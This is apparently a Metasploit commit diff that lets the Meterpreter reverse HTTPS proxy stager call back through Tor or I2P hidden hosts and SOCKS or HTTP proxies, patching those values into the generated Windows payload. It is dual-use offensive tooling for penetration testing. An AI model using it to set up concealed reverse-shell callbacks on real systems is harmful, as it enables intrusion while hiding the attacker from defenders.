enable tor and small fix

Author: Alexandre Maloteaux

data/meterpreter/metsrv.dll

@@ -83,13 +83,21 @@ def ssl?
 	# addresses.
 	#
 	def full_uri
-		lhost = datastore['LHOST']
+		if datastore['HIDDENHOST']
+			lhost = datastore['HIDDENHOST']
+		else
+			lhost = datastore['LHOST']
+		end
 		if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
 			lhost = Rex::Socket.source_address
 		end
 		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
 		scheme = (ssl?) ? "https" : "http"
-		uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
+		if datastore['HIDDENPORT']
+			uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
+		else
+			uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
+		end
 
 		uri
 	end
@@ -308,6 +316,11 @@ def on_request(cli, req, obj)
 							if proxyport == "80"
 								proxyinfo = proxyhost
 							end
+							if datastore['PROXY_TYPE'].to_s == 'HTTP'
+								proxyinfo = 'http://' + proxyinfo
+							else #socks
+								proxyinfo = 'socks=' + proxyinfo
+							end
 							proxyinfo << "\x00"
 							blob[i, proxyinfo.length] = proxyinfo
 							print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")

lib/msf/core/handler/reverse_http.rb

@@ -38,8 +38,14 @@ def initialize(info = {})
 
 		register_options(
 			[
-				OptPort.new('LPORT', [ true, "The local listener port", 8443 ])
-			], Msf::Handler::ReverseHttpsProxy)
+				OptString.new('LHOST', [ true, "The local listener hostname" ,"127.0.0.1"]),
+				OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
+				OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
+				OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
+				OptString.new('HIDDENHOST', [false, "The tor/i2p hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
+				OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
+				OptEnum.new('PROXY_TYPE', [true, 'HTTP or SOCKS proxy type', 'HTTP', ['HTTP', 'SOCKS']])
+ 			], Msf::Handler::ReverseHttpsProxy)
 
 	end
 

lib/msf/core/handler/reverse_https_proxy.rb

@@ -19,7 +19,7 @@ def initialize(info = {})
 		super(merge_info(info,
 			'Name'          => 'Reverse HTTPS Stager with Support for Custom Proxy',
 			'Description'   => 'Tunnel communication over HTTP using SSL, supports custom proxy',
-			'Author'        => ['hdm','corelanc0d3r <[email protected]>'],
+			'Author'        => ['hdm','corelanc0d3r <[email protected]>', 'amaloteaux'],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'win',
 			'Arch'          => ARCH_X86,
@@ -88,7 +88,11 @@ def generate
 		if proxyport == "80"
 			proxyinfo = proxyhost
 		end
-
+		if datastore['PROXY_TYPE'].to_s == 'HTTP'
+			proxyinfo = 'http://' + proxyinfo
+		else #socks
+			proxyinfo = 'socks=' + proxyinfo
+		end
 		proxyloc = p.index("PROXYHOST:PORT")
 		p = p.gsub("PROXYHOST:PORT",proxyinfo)
 
@@ -98,14 +102,26 @@ def generate
 		p[proxyloc-4] = [calloffset].pack('V')[0]
 
 		# patch the LPORT
+		if datastore['HIDDENPORT']
+			lport = datastore['HIDDENPORT']
+		else
+			lport = datastore['LPORT']
+		end
+
 		lportloc = p.index("\x68\x5c\x11\x00\x00")  # PUSH DWORD 4444
-		p[lportloc+1] = [datastore['LPORT'].to_i].pack('V')[0]
-		p[lportloc+2] = [datastore['LPORT'].to_i].pack('V')[1]
-		p[lportloc+3] = [datastore['LPORT'].to_i].pack('V')[2]
-		p[lportloc+4] = [datastore['LPORT'].to_i].pack('V')[3]
+		p[lportloc+1] = [lport.to_i].pack('V')[0]
+		p[lportloc+2] = [lport.to_i].pack('V')[1]
+		p[lportloc+3] = [lport.to_i].pack('V')[2]
+		p[lportloc+4] = [lport.to_i].pack('V')[3]
 
 		# append LHOST and return payload
-		p + datastore['LHOST'].to_s + "\x00"
+
+		if datastore['HIDDENHOST']
+			lhost = datastore['HIDDENHOST']
+		else
+			lhost = datastore['LHOST']
+		end
+		p + lhost.to_s + "\x00"
 
 	end